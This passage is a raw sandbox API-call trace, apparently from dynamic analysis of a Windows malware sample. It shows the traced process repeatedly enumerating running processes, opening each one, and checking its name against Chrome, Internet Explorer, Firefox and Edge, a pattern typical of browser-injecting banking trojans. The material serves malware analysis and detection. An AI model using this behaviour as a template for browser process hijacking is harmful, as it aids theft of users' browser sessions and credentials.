	[0224.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0224.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5b88
	[0224.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.800] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0224.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.800] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.801] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0224.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.801] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5b8c
	[0224.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.802] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.802] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.803] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.803] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.804] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.805] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5b90
	[0224.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.805] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.805] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.806] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.806] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.806] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5b94
	[0224.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.807] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.807] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.808] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.808] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.808] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5b98
	[0224.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.809] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.809] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.810] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.810] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0224.811] CloseHandle (hObject=0x4fd0) returned 1
	[0224.811] Sleep (dwMilliseconds=0x64) 
	[0224.918] GetCurrentProcessId () returned 0x110
	[0224.918] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0224.921] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0224.923] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0224.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0224.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5b9c
	[0224.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.925] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.925] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.926] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.926] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5ba0
	[0224.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.927] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.927] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.928] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.928] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0224.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5ba4
	[0224.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.929] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0224.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.929] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.929] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0224.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.930] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.930] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5ba8
	[0224.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.931] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.931] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.931] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.932] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0224.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5bac
	[0224.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.933] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0224.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.933] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.934] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0224.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.934] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0224.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5bb0
	[0224.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.935] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0224.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.935] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.936] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0224.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.936] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.936] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0224.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5bb4
	[0224.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.938] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0224.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.938] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.938] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0224.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.939] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0224.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5bb8
	[0224.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.940] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.940] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.940] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.940] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.940] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5bbc
	[0224.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.941] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.942] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.942] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.942] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.943] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5bc0
	[0224.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.943] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.944] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.944] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.944] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.945] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5bc4
	[0224.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.945] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.946] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.946] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.946] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5bc8
	[0224.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.947] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.948] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.948] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.948] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.948] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5bcc
	[0224.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.949] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.950] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.950] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.950] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.950] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5bd0
	[0224.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.951] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.952] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.952] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.952] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5bd4
	[0224.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.954] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.955] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0224.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5bd8
	[0224.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.956] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0224.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.957] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.957] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0224.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.957] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.957] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5bdc
	[0224.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.958] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.959] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.959] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.959] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.959] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0224.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5be0
	[0224.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.960] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.961] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.961] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.961] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.961] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5be4
	[0224.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.962] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
